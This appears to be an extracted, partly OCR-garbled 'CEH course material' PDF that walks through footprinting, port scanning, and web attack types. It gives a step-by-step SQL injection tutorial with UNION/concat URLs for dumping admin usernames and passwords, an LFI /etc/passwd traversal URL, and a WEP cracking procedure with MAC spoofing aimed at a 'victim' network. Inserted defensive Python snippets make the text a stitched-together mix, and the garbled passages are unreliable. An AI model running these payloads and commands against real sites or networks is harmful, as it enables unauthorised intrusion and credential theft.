copyright © 2016 EAPL 4

But you can also give the Matriux Operating System and Knoppix a try. Matriux OS is just awesome, but it is still under construction, as its designers are still working on it and patching it.

Now let's discuss more about the functionality of the BackTrack operating system.

Best Operating System: BackTrack Linux

BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless of whether you're making BackTrack your primary operating system, booting from a Live DVD, or using your favorite thumb drive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

BackTrack is intended for all audiences, from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tool collection to date.

BackTrack is quite possibly the most comprehensive Linux distribution of security tools. Both hackers and crackers can appreciate the features of this distribution. For black-hat hackers, it provides easy access to software that facilitates exploitation of secured systems and other reverse engineering. For white-hatters, it is a penetration tester that finds holes in a security scheme. See, everybody wins!


Major Features of BackTrack Linux

BackTrack features the latest in security penetration software. The current Linux kernel is patched so that special driver installation is unnecessary for attacks. For example, an Atheros-based wireless networking adapter will not enter monitor mode or inject packets without the MadWifi driver patch. With BackTrack, you don't need to worry about that. It's just plug-and-play, ready to go! What's great is that this Linux distribution comes Live-on-CD, so no installation is needed. However, once you experience BackTrack, you will realize that it is a must to download this operating system and install it on your laptop. At the very least, download the VMware Virtual Appliance for BackTrack. Make sure you also install the VMware Tools for Linux as well. Many features will still work in VMware mode.

• Based on: Debian, Ubuntu
• Origin: Switzerland
• Architecture: i386
• Desktop: Fluxbox, KDE
• Category: Forensics, Rescue, Live Medium
• Cost: Free

Hacking Tools:

BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.

BackTrack includes many well-known security tools, including:

• Metasploit integration
• RFMON injection-capable wireless drivers
• Kismet
• Nmap
• Ettercap
• Wireshark (formerly known as Ethereal)
• BeEF (Browser Exploitation Framework)

A large collection of exploits as well as more commonplace software such as browsers. BackTrack arranges tools into 11 categories:

• Information Gathering
• Network Mapping
• Vulnerability Identification
• Web Application Analysis
• Radio Network Analysis (802.11, Bluetooth, RFID)
• Penetration (Exploit & Social Engineering Toolkit)
• Privilege Escalation
• Maintaining Access
• Digital Forensics
• Reverse Engineering
• Voice Over IP


Footprinting and How It Can Be Helpful to Hack Systems

Page 9: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 9/67


2. Now you can use this information to search for more about the person, simply using Google, as shown in the next snapshot.

Now it's on you how much info you want to explore about the person and the website which you want to hack!


I think you all will like this! We will continue our discussion on FOOTPRINTING tomorrow also, as it is the most important phase. We will explore more information in the next class; I will explain a few more interesting facts and information-exploring things, so read on!

First of all we will focus on unearthing the basic information about the site, i.e. the IP and server information. I will show you with the help of snapshots:

First go to START > RUN > type cmd > then type tracert www.websitename.com

Here we will use two basic commands in the command prompt (cmd): tracert and ping www.websitename.com

It will look something like this:

We trace routed www.amulive.com

1. Shows our gateway of connectivity.
2. Shows our outgoing footprint IP, i.e. our IP that is being analyzed by the website.
3. Shows which service provider the connectivity passes through. I use BSNL but it's showing Airtel because I prefer the DNS of Airtel for quick surfing.

The next steps show the IPs of the web servers through which amulive is being maintained. After this we come to know the IP of the website and the IPs of its web servers, which are used further. The website IP can be used to gather more information about the website.

How to Find the Personal Information About an Individual Over the Net ??

It's one of the most important tasks. It's also helpful in finding the fake profiles! But unfortunately this is limited, so we use it to the most. There are two websites which will help us:

1. http://people.yahoo.com best site to trace people for their personal information and also reverse phone or mobile number lookup
2. http://www.intellius.com but this site is limited to US only

Sample Report from Intellius:

S"tellite 8icture o Ooe>! Hou!e rom Intelliu!,

 -ow 2!ing the!e Site! you will (e "(le to collect the #er!on"l inorm"tion o the indi&idu"l!

"nd "l!o (eing "(le to identiy the "'e #roile!))


%ou c"n "&oid "(o&e hectic wor' (y u!ing thi! tool , S#iderFoot

Downlo"d lin', htt#,www)(in"ry#ool)com!#ideroot

Inorm"tion "(out S#iderFoot,

S#iderFoot i! " ree+ o#en/!ource+ dom"in oot#rinting tool) Gi&en one or multi#le dom"in

n"me! "nd when I !"y dom"in!+ I>m reerring to the D-S 'ind+ not Window! dom"in!+ it

will !cr"#e the we(!ite! on th"t dom"in+ "! well "! !e"rch Google+ -etcr"t+ Whoi! "nd D-S

to (uild u# inorm"tion li'e,

• Su(dom"in!

• Aili"te!

• We( !er&er &er!ion!

• 2!er! i)e) Pu!er

• Simil"r dom"in!

copyright © 2016 EAPL 15

Page 16: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 16/67

• Em"il "ddre!!e!

•  -et(loc'!


 -ote "ll the!e tool! "re reew"re! )) 2 c"n e"!ily google then "nd downlo"d the!e))

• Whoi!•  -!loo'u#

• ARI-

•  -eo Tr"ce

• 6i!u"lRoute Tr"ce

• Sm"rtWhoi!

• e."ilTr"c'er8ro

• We(!ite w"tcher 

• Google E"rth

• GE1 S#ider • HTTr"c' We( Co#ier 

• E/m"il S#ider 

Thi! i! "ll "(out Foot#rinting ) -ow 2!e the G"thered inorm"tion to m"'e ("!ic

Det"iled Inorm"tion "(out the We(!ite#er!on?

copyright © 2016 EAPL 16

Sc"nning "nd Att"c'ing 1#en 8ort!

In Sc"nning 8"rt We Will Co&er the Following To#ic! in det"il! ,

P Deinition o !c"nning

P Ty#e! "nd o(*ecti&e! o Sc"nning

P 2nder!t"nding Sc"nning methodology

P Chec'ing li&e !y!tem! "nd o#en #ort!

P 2nder!t"nding !c"nning techni@ue!

P Dierent tool! #re!ent to #erorm Sc"nning

P 2nder!t"nding ("nner gr"((ing "nd 1S inger#rinting

P Dr"wing networ' di"gr"m! o &ulner"(le ho!t!

P 8re#"ring #roxie!

P 2nder!t"nding "nonymi;er!

P Sc"nning counterme"!ure!

What Is Scanning ?? And Why We Focus On That ?

Scanning, as the name says, means that we scan something to find some details. Scanning basically refers to gathering the following four pieces of information. We scan systems for four basic purposes:

• To find a specific IP address
• Operating system
• System architecture
• Services running on the system

The various types of scanning are as follows:

• Port Scanning
• Network Scanning
• Vulnerability Scanning

I want to define these terms here only, as they are of great use in further tutorials!

PORT SCANNING: There are 65k ports in a computer, out of which 1k are fixed for system or OS services. In port scanning we scan for the open ports which can be used to attack the victim computer. In port scanning a series of messages is sent to a computer to learn about the computer's network services. Through this we will know which port we will use to attack the victim.

NETWORK SCANNING: Network scanning is basically a procedure for finding the active hosts on the network, i.e. we try to find whether a system is standalone or multiuser. This is done either for the purpose of attacking them or for network security assessment, i.e. how secure the network is.

VULNERABILITY SCANNING: As the name says, in this type of scanning we scan the systems to find the vulnerability, i.e. the weakness in the OS/database. Once we find the vulnerability or loophole we can utilize it to best effect and attack the victim through that.

These are the primary objectives of scanning, i.e. why we do scanning:

• To detect the live systems running on the network.
• To discover which ports are active/running.
• To discover the operating system running on the target system (fingerprinting).
• To discover the services running on the target system.
• To discover the IP address of the target system.
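A defender's counterpart to the port-scanning definition above, added here as an example (it is not from the course material): a small detector that reads constructed firewall log lines and flags a source that touches many distinct ports on one host within a short window, which is exactly the pattern a port scan leaves behind. The log format, the addresses and the thresholds are assumptions for this example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed firewall-style log lines (invented for this example). The first
# source touches ten different ports in three seconds; the second is a normal
# browser hitting only 80 and 443.
SAMPLE_LOG = """\
2016-03-01T10:00:01 DROP src=203.0.113.7 dst=192.0.2.10 dport=21 proto=tcp
2016-03-01T10:00:01 DROP src=203.0.113.7 dst=192.0.2.10 dport=22 proto=tcp
2016-03-01T10:00:01 DROP src=203.0.113.7 dst=192.0.2.10 dport=23 proto=tcp
2016-03-01T10:00:02 DROP src=203.0.113.7 dst=192.0.2.10 dport=25 proto=tcp
2016-03-01T10:00:02 DROP src=203.0.113.7 dst=192.0.2.10 dport=53 proto=tcp
2016-03-01T10:00:02 ACCEPT src=203.0.113.7 dst=192.0.2.10 dport=80 proto=tcp
2016-03-01T10:00:03 DROP src=203.0.113.7 dst=192.0.2.10 dport=110 proto=tcp
2016-03-01T10:00:03 DROP src=203.0.113.7 dst=192.0.2.10 dport=143 proto=tcp
2016-03-01T10:00:03 ACCEPT src=203.0.113.7 dst=192.0.2.10 dport=443 proto=tcp
2016-03-01T10:00:03 DROP src=203.0.113.7 dst=192.0.2.10 dport=3306 proto=tcp
2016-03-01T10:00:05 ACCEPT src=198.51.100.5 dst=192.0.2.10 dport=80 proto=tcp
2016-03-01T10:00:06 ACCEPT src=198.51.100.5 dst=192.0.2.10 dport=443 proto=tcp
2016-03-01T10:00:09 ACCEPT src=198.51.100.5 dst=192.0.2.10 dport=80 proto=tcp
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>\w+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
    r"dport=(?P<dport>\d+) proto=(?P<proto>\w+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    rec["dport"] = int(rec["dport"])
    return rec


def detect_port_scans(lines, window_seconds=60, min_ports=8):
    """Return {(src, dst): sorted ports} for every source that hit at least
    min_ports distinct destination ports on one host within window_seconds.

    DROP and ACCEPT lines both count: a scanner learns from either answer,
    and the number of *distinct* ports is what separates a scan from traffic."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            events[(rec["src"], rec["dst"])].append((rec["ts"], rec["dport"]))

    alerts = {}
    for pair, evs in events.items():
        evs.sort()
        lo = 0
        for hi in range(len(evs)):
            # slide the window start forward until it spans <= window_seconds
            while (evs[hi][0] - evs[lo][0]).total_seconds() > window_seconds:
                lo += 1
            if len({port for _, port in evs[lo:hi + 1]}) >= min_ports:
                alerts[pair] = sorted({port for _, port in evs})
                break
    return alerts


if __name__ == "__main__":
    for (src, dst), ports in detect_port_scans(SAMPLE_LOG.splitlines()).items():
        print(f"possible port scan {src} -> {dst}: {len(ports)} ports {ports}")
```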

We will prefer TOOLS for this because they will reduce our hectic work! The first tool that we use is NMAP:

DOWNLOAD: http://nmap.org/dist/nmap-<version>-setup.exe (the version number is unreadable in the source)

Features of NMAP:

• Nmap is used to carry out port scanning, OS detection, version detection, ping sweeps, and many other techniques.
• It scans a large number of machines at one time.
• It is supported by many operating systems.
• It can carry out all types of port scanning techniques.

SECOND TOOL IS NET TOOLS 5.0.70:

It is a collection of various networking tools, a must for beginners!

DOWNLOAD: http://www.softpedia.com/progDownload/Net-Tools-Download-2213.html

• Net Tools Suite Pack is a collection of scanning tools.
• This toolset contains tons of port scanners, flooders, web rippers, and mass e-mailers. Note: Some of these tools may not work, but some are too good.

First of all, what is OS fingerprinting?

What is OS Fingerprinting ??

OS fingerprinting is the method of determining the operating system that is running on the target system. The two different types of fingerprinting are:

• Active stack fingerprinting
• Passive fingerprinting

Active Stack Fingerprinting:

Based on the fact that OS vendors implement the TCP stack differently. Specially crafted packets are sent to remote OSs and the response is noted. The responses are then compared with a database to determine the OS.

Passive Fingerprinting:

Passive banner grabbing refers to indirectly scanning a system to reveal its server's operating system. It is also based on the differential implementation of the stack and the various ways an OS responds to it. It uses sniffing techniques instead of scanning techniques. It is less accurate than active fingerprinting.

TOOL USED FOR OS FINGERPRINTING: p0f OS Fingerprinting Tool

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

• machines that connect to your box (SYN mode),
• machines you connect to (SYN+ACK mode),
• machines you cannot connect to (RST+ mode),
• machines whose communications you can observe.

P0f can also do many other tricks, and can detect or measure the following:

• firewall presence, NAT use (useful for policy enforcement),
• existence of a load balancer setup,
• the distance to the remote system and its uptime,
• other guy's network hookup (DSL, OC3, avian carriers) and his ISP.

What is Vulnerability???

As I told in the first class, a vulnerability is a weakness in the network, system, database etc. We can call a vulnerability the loophole, i.e. the way through which a victim can be attacked. We first analyze the loophole and then try to use it to best effect to hack the system of the victim, organisation or website.

1. Nessus
2. Retina

The Nessus vulnerability scanner is the world leader in active scanners, featuring high speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture. Nessus scanners can be distributed throughout an entire enterprise, inside DMZs, and across physically separate networks.


• Plug-in architecture
• NASL (Nessus Attack Scripting Language)
• Can test an unlimited number of hosts simultaneously
• Smart service recognition
• Client-server architecture
• Smart plug-ins
• Up-to-date security vulnerability database

SAMPLE SNAPSHOT:

DOWNLOAD NESSUS:

Retina Network Security Scanner, the industry and government standard for multi-platform vulnerability management, identifies known and zero-day vulnerabilities, plus provides security risk assessment, enabling security best practices, policy enforcement, and regulatory

Now, after scanning the systems for vulnerabilities, we will go on to attack the systems, but before this we should know the risk. This risk can be reduced to a great extent by using proxies. In the next class we will discuss what proxies are, how they work, how they are going to help us, and some undetectable and untraceable proxy servers!

1. SQL INJECTION
2. CROSS SITE SCRIPTING
3. REMOTE FILE INCLUSION
4. LOCAL FILE INCLUSION
5. DDOS ATTACK
6. EXPLOITING VULNERABILITY

1. SQL INJECTION: First of all, what is SQL injection? SQL injection is a type of security exploit or loophole in which an attacker "injects" SQL code through a web form or manipulates URLs based on SQL parameters. It exploits web applications that use client-supplied SQL queries.

The primary form of SQL injection consists of direct insertion of code into user-input variables that are concatenated with SQL commands and executed. A less direct attack injects malicious code into strings that are destined for storage in a table or as metadata. When the stored strings are subsequently concatenated into a dynamic SQL command, the malicious code is executed.

2. CROSS SITE SCRIPTING: Cross site scripting (XSS) occurs when a user inputs malicious data into a website, which causes the application to do something it wasn't intended to do. XSS attacks are very popular and some of the biggest websites have been affected by them, including the FBI, CNN, Ebay, Apple, Microsoft, and AOL.

Some website features commonly vulnerable to XSS attacks are:

• Search Engines
• Login Forms
• Comment Fields

Cross-site scripting holes are web application vulnerabilities that allow attackers to bypass client-side security mechanisms normally imposed on web content by modern browsers. By finding ways of injecting malicious scripts into web pages, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other information maintained by the browser on behalf of the user. Cross-site scripting attacks are therefore a special case of code injection.

I will explain this in detail in later hacking classes. So keep reading..

4% 3"M*T" F-L" -CL5S-*7emote file inclusion is the most often found vulnerability on the website.

7emote 'ile #nclusion 97'#: occurs when a remote file, usually a shell 9a graphical interface for

 browsing remote files and running your own code on a server:, is included into a website which allows

the hacker to e"ecute server side commands as the current logged on user, and have access to files on

the server. ith this power the hacker can continue on to use local

e"ploits to escalate his privileges and take over the whole system.

7'# can lead to following serious things on website /

• ode e"ecution on the web server

• ode e"ecution on the client-side such as avascript which can lead to other attacks such as

cross site scripting 9I:.

• Denial of ervice 9Do:

• Data %heftF)anipulation

4. LOCAL FILE INCLUSION: Local File Inclusion (LFI) is when you have the ability to browse through the server by means of directory traversal. One of the most common uses of LFI is to discover the /etc/passwd file. This file contains the user information of a Linux system. Hackers find sites vulnerable to LFI the same way I discussed for RFIs.

Let's say a hacker found a vulnerable site, www.target-site.com/index.php?p=about. By means of directory traversal he would try to browse to the /etc/passwd file:

www.target-site.com/index.php?p=../../../../../../../etc/passwd

I will explain it in detail with practical website examples in later sequential classes on Website


5. DDOS ATTACK

A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of the concerted efforts of a person or people to prevent an Internet site or service from functioning efficiently or at all, temporarily or indefinitely. In a DDoS attack we consume the bandwidth and resources of a website and make it unavailable to its legitimate users.

For more detailed hack on DDOS visit:

6. EXPLOITING VULNERABILITY: It's not a new category; it comprises the above five categories, but I mentioned it separately because there are several exploits which cannot be covered in the above five categories. So I will explain them individually with examples. The basic idea behind this is to find the vulnerability in the website and exploit it to get admin or moderator privileges so that you can manipulate things easily.


Hello friends, in my previous class on how to hack websites I explained the various topics that we will cover in the hacking classes. Let's today start with the first topic, Hacking Websites using SQL injection tutorial. If you have missed the previous hacking class, don't worry, read it here.

So guys, let's start our tutorial of Hacking Websites using the SQL injection technique. First of all, I will provide you a brief introduction to SQL injection.

Note: This article is for Educational Purposes only. Please don't misuse it. Isoftdl and me are not responsible for any misuse done by you.

MySQL is a very common database system these days that websites use, and you will be surprised by the fact that it's the most vulnerable database system ever. It has unlimited loopholes and fixing them is a very tedious task. Here we will discuss how to exploit those vulnerabilities manually without any tool.

Hacking Websites using SQL Injection

STEPS TO HACK WEBSITES USING SQL

1. Finding the target and vulnerable websites

First of all we must find out our target website. I have collected a lot of dorks, i.e. the vulnerability points of the websites. Some Google searches can be awesomely utilized to find out vulnerable websites. Below is an example of some queries.

Examples: Open Google and copy-paste these queries:













Search Google for more Google dorks to hack websites. I cannot put them on my website as they are too critical to discuss. We can discuss them in the comments of this post, so keep posting and reading there.

2. Checking for Vulnerability on the website

Suppose we have a website like this:

To test this URL, we add a quote to it

On executing it, if we get an error like this: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc" or something like that, that means the target website is vulnerable to SQL injection and you can hack it.

3. Find the number of columns

To find the number of columns we use the statement ORDER BY (it tells the database how to order the result). So how to use it? Well, just increment the number until we get an error.

http://www.site.com/products.php?id=5 order by 1/* --> no error
http://www.site.com/products.php?id=5 order by 2/* --> no error
http://www.site.com/products.php?id=5 order by 3/* --> no error
http://www.site.com/products.php?id=5 order by 4/* --> Error (we get a message like this: Unknown column '4' in 'order clause', or something like that)

That means that it has 3 columns, because we got an error on 4.

4. Check for UNION function

With union we can select more data in one SQL statement. So we have

http://www.site.com/products.php?id=5 union all select 1,2,3/*

(we already found that the number of columns is 3 in section 2). If we see some numbers on screen, i.e. 1 or 2 or 3, then the UNION works.

5. Check for MySQL version

http://www.site.com/products.php?id=5 union all select 1,2,3/*

NOTE: if /* is not working or you get some error, then try --. It's a comment and it's important for our query to work properly.

Let's say that we have number 2 on the screen. Now to check for the version we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar. It should look like this:

http://www.site.com/products.php?id=5 union all select 1,@@version,3/*

If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE)": I didn't see any paper covering this problem, so I must write it. What we need is the convert() function:

http://www.site.com/products.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex():

http://www.site.com/products.php?id=5 union all select

and you will get the MySQL version.

6. Getting table and column names

Well, if the MySQL version is less than 5 (i.e. 4.1.33, 4.1.12) <-- later I will describe this for MySQL versions greater than 5. We must guess the table and column names in most cases.

Common table names are: user/s, admin/s, member/s
Common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc.

i.e. it would be

http://www.site.com/products.php?id=5 union all select 1,2,3 from admin/*

(we see number 2 on the screen like before, and that's good). We know that table admin exists.

Now to check column names.

http://www.site.com/products.php?id=5 union all select 1,username,3 from admin/*

(if you get an error, then try the other column name)

We get the username displayed on screen; an example would be admin, or superadmin etc.

Now to check if column password exists

http://www.site.com/products.php?id=5 union all select 1,password,3 from admin/*

(if you get an error, then try the other column name)

We see the password on the screen in hash or plain text; it depends on how the database is set up, i.e. md5 hash, mysql hash, sha1.

Now we must complete the query to look nice. For that we can use the concat() function (it joins strings):

http://www.site.com/products.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that I put 0x3a; it's the hex value for : (so 0x3a is the hex value for colon). (There is another way for that, char(58), the ascii value for :)

http://www.site.com/products.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get username:password displayed on screen, i.e. admin:admin or

When you have this, you can login as admin or some superuser.

If you can't guess the right table name, you can always try mysql.user (default). It has user and password columns, so an example would be

http://www.site.com/products.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

7. MySQL 5

Like I said before, I'm gonna explain how to get table and column names in MySQL greater than 5. For this we need information_schema. It holds all tables and columns in the database. To get tables we use table_name and information_schema.tables.

http://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables.

http://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

Note that I put 0,1 (get 1 result starting from the 0th). Now to view the second table, we change limit 0,1 to limit 1,1:

http://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

The second table is displayed. For the third table we put limit 2,1:

http://www.site.com/products.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc.

To get the column names the method is the same. Here we use column_name and information_schema.columns. The method is the same as above, so an example would be

http://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is displayed. The second one (we change limit 0,1 to limit 1,1):

http://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like username, user, login, password, pass, passwd etc.

If you wanna display column names for a specific table, use this query (where clause). Let's say that we found table users.

http://www.site.com/products.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*

Now we get the column names in table users displayed. Just using LIMIT we can list all columns in table users. Note that this won't work if magic quotes is ON.

Let's say that we found columns user, pass and email. Now to complete the query to put them all together. For that we use concat(), which I described earlier.

http://www.site.com/products.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*

What we get here is user:pass:email from table users. Example: admin:hash:whatever@blabla.com

But the passwords are in hash format, so we need to crack the hash. Note 90% of hashes are crackable but 10% are still there which are unable to crack. So don't feel bad if some hash doesn't crack.
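The column-count probe, UNION and concat() steps from the walkthrough above, run against a throwaway SQLite database beside the parameterised query that stops them. This is an added example, not part of the course material; the tables, rows and hash are constructed for it, and SQLite's || operator stands in for MySQL's concat().

```python
import sqlite3


def make_demo_db():
    """Constructed demo database standing in for the site's MySQL backend:
    a product table queried by products.php?id=... and an admin table.
    The hash is a constructed sample value, not taken from any real system."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price TEXT);
        INSERT INTO products VALUES (5, 'Widget', '9.99');
        INSERT INTO products VALUES (6, 'Gadget', '19.99');
        CREATE TABLE admin(username TEXT, password TEXT);
        INSERT INTO admin VALUES ('admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return con


def product_vulnerable(con, id_param):
    """The pattern behind products.php?id=5: the raw parameter is pasted into
    the SQL text, so 'order by 4' or 'union all select ...' become part of it."""
    sql = "SELECT id, name, price FROM products WHERE id=" + id_param
    return con.execute(sql).fetchall()


def product_safe(con, id_param):
    """Hardened version: the value is validated as an integer and bound as a
    parameter, so the database never interprets it as SQL."""
    product_id = int(id_param)          # raises ValueError for anything else
    return con.execute(
        "SELECT id, name, price FROM products WHERE id=?", (product_id,)
    ).fetchall()


def probe_column_count(con, max_columns=10):
    """Re-create the tutorial's ORDER BY probe against the vulnerable query:
    the first n that errors means the query has n-1 columns
    (returns None if no n up to max_columns errors)."""
    for n in range(1, max_columns + 1):
        try:
            product_vulnerable(con, "5 order by %d" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None


if __name__ == "__main__":
    con = make_demo_db()
    print("columns found by ORDER BY probe:", probe_column_count(con))
    print(product_vulnerable(con, "5 union all select 1,username||':'||password,3 from admin"))
    try:
        product_safe(con, "5 union all select 1,2,3")
    except ValueError as e:
        print("parameterised version rejected the input:", e)
```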

For cracking the MD5 hash values you can use this:

1) Check the net whether this hash is cracked before:

2) Crack the password with the help of a site:

3) Use a MD5 cracking software:

STEPS TO HACK WIFI OR WIRELESS PASSWORD

1. Get the Backtrack-Linux CD. Backtrack Linux Live CD (best Linux available for hackers, with more than 2000 hacking tools inbuilt). Download Backtrack Linux Live CD from here: CLICK HERE

2. SCAN TO GET THE VICTIM

Get the victim to attack, that is, whose password you want to hack or crack. Now enter the Backtrack Linux CD into your CD drive and start it. Once it's started, click on the black box in the lower left corner to load up a KONSOLE. Now you should start your Wifi card. To do so type

You will see the name of your wireless card (mine is named "ath0"). From here on out, replace "ath0" with the name of your card. Now type

airmon-ng stop ath0

then type:

ifconfig wifi0 down

then type:

macchanger --mac 00:11:22:33:44:55 wifi0

then type:

airmon-ng start wifi0

The above steps I have explained are to spoof yourself from being traced. In the above step we are spoofing our MAC address; this will keep us undiscovered.

Now type:

airodump-ng ath0

All the above steps in one screenshot:

Now you will see a list of wireless networks in the Konsole. Some will have a better signal than others, and it's always a good idea to pick one that has the best signal strength; otherwise it will take a huge time to crack or hack the password, or you may not be able to crack it at all.

Once you see the networks list, select the network you want to hack. To freeze the airodump screen HOLD the CNTRL key and press C.

Now you will see something like this:

4% S"L"CT-. "T&*3, F*3 HAC,-.Now find the network that you want to crack and )!56 076 that it says theencryption for that network is 6P. #f it says P! or any variation of P! then

move onyou can still crack P! with backtrack and some other tools but it is a

 whole other ball game and you need to master 6P first.

copyright © 2016 EAPL 62

1nce you*ve decided on a network, take note of its channel number and bssid. %he

 bssid will look something like this T


%he hannel number will be under a heading that says @HA. !s shown in this figure/

copyright © 2016 EAPL 63

Page 64: CEH Course Material

8/17/2019 CEH Course Material

http://slidepdf.com/reader/full/ceh-course-material 64/67

Now in the same KONSOLE window type:

airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

The file name can be whatever you want. This file is the place where airodump is going to store the packets of info that you receive, to later crack. You don't even put in an extension.. just pick a random word that you will remember. I usually make mine "Ben" because I can always remember it. It's simply because I love ben10.. hhahahahaha :D

Note: If you want to crack more than one network in the same session, you must have different file names for each one or it won't work. I usually name them as ben1, ben2

Once you have typed in that last command, the screen of airodump will change and start to show your computer gathering packets. You will also see a heading marked "IV" with a number underneath it. This stands for "Initialization Vector", but in general terms all this means is "packets of info that contain characters of the password." Once you gain a minimum of 5,000 of these IVs, you can try to crack the password. I've cracked some right at 5,000 and others have taken over 60,000. It just depends on how long and difficult they made the password. The more difficult the password, the more packets you will need to crack it.
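Why those IVs matter, as an added worked example that is not from the course material: WEP's initialisation vector is only 24 bits, so with IVs chosen at random two frames share an IV, and therefore an RC4 keystream, far sooner than the 16.7 million frame space suggests. The functions below compute that birthday bound; the frame counts fed to them are constructed inputs chosen to bracket the figures quoted above.

```python
import math

IV_BITS = 24                 # WEP prepends a 24-bit IV to the RC4 key
IV_SPACE = 1 << IV_BITS      # 16,777,216 distinct IVs; a sequential counter wraps here


def p_iv_reuse(frames):
    """Probability that at least two of `frames` frames share an IV when each
    IV is drawn uniformly at random (the birthday bound). The product of
    (1 - i/N) terms is accumulated with log1p so it does not underflow."""
    if frames > IV_SPACE:
        return 1.0
    log_no_reuse = 0.0
    for i in range(frames):
        log_no_reuse += math.log1p(-i / IV_SPACE)
    return 1.0 - math.exp(log_no_reuse)


def expected_reused_pairs(frames):
    """Expected number of frame pairs that share an IV, and so a keystream."""
    return frames * (frames - 1) / 2 / IV_SPACE


def frames_for_reuse_probability(p):
    """Smallest frame count at which p_iv_reuse() reaches p. Starts a little
    below the closed-form estimate sqrt(-2 N ln(1-p)) and refines exactly."""
    if not 0.0 < p < 1.0:
        raise ValueError("p must be strictly between 0 and 1")
    n = max(int(math.sqrt(-2.0 * IV_SPACE * math.log1p(-p))) - 10, 1)
    while p_iv_reuse(n) < p:
        n += 1
    return n


if __name__ == "__main__":
    print("IV space:", IV_SPACE)
    print("50% chance of an IV collision after",
          frames_for_reuse_probability(0.5), "random-IV frames")
    for n in (5000, 10000, 60000):          # constructed sample frame counts
        print(f"{n:6d} frames: P(reuse) = {p_iv_reuse(n):.3f}, "
              f"expected reused pairs = {expected_reused_pairs(n):.1f}")
```

Every repeated IV gives an observer two ciphertexts under the same keystream, and a driver that hands out IVs sequentially only postpones the repeat until the counter wraps, which is why the defence is to retire WEP rather than to tune it.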

4. Cracking the WEP password

Now leave this Konsole window up and running and open up a 2nd Konsole window. In this window type:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

This will send some commands to the router that basically tell it to associate your computer, even though you are not officially connected with the password. If this command is successful, you should see about 4 lines of text print out, with the last one saying something similar to "Association Successful :-)". If this happens, then good! You are almost there.

Now type:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 ath0

This will generate a bunch of text and then you will see a line where your computer is gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what these mean.. just know that these are your meal tickets. Now you just sit and wait. Once your computer finally gathers an ARP request, it will send it back to the router and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to happen within seconds.. sometimes you have to wait up to a few minutes. Just be patient. When it finally does happen, switch back to your first Konsole window and you should see the number underneath the IV starting to rise rapidly. This is great! It means you are almost finished! When this number reaches AT LEAST 5,000 then you can start your password crack. It will probably take more than this, but I always start my password cracking at 5,000 just in case they have a really weak password.

Now you need to open up a 3rd and final Konsole window. This will be where we actually crack the password. Now type:

aircrack-ng -b (bssid) (filename)-01.cap

Remember the file name you made up earlier? Mine was "Ben". Don't put a space in between it and -01.cap here. Type it as you see it. So for me, I would type wepkey-


Once you have done this you will see aircrack fire up and begin to crack the password. Typically you have to wait for more like 10,000 to 20,000 IVs before it will crack. If this is the case, aircrack will test what you've got so far and then it will say something like "not enough IVs. Retry at 10,000."

DON'T DO ANYTHING! It will stay running.. it is just letting you know that it is on pause until more IVs are gathered. Once you pass the 10,000 mark it will automatically fire up again and try to crack it. If this fails it will say "not enough IVs. Retry at 15,000." and so on until it finally gets it.

If you do everything correctly up to this point, before too long you will have the password! Now if the password looks goofy, don't worry, it will still work. Some passwords are saved in ASCII format, in which case aircrack will show you exactly what characters they typed in for their password. Sometimes, though, the password is saved in HEX format, in which case the computer will show you the HEX encryption of the password. It doesn't matter either way, because you can type in either one and it will connect you to the network.

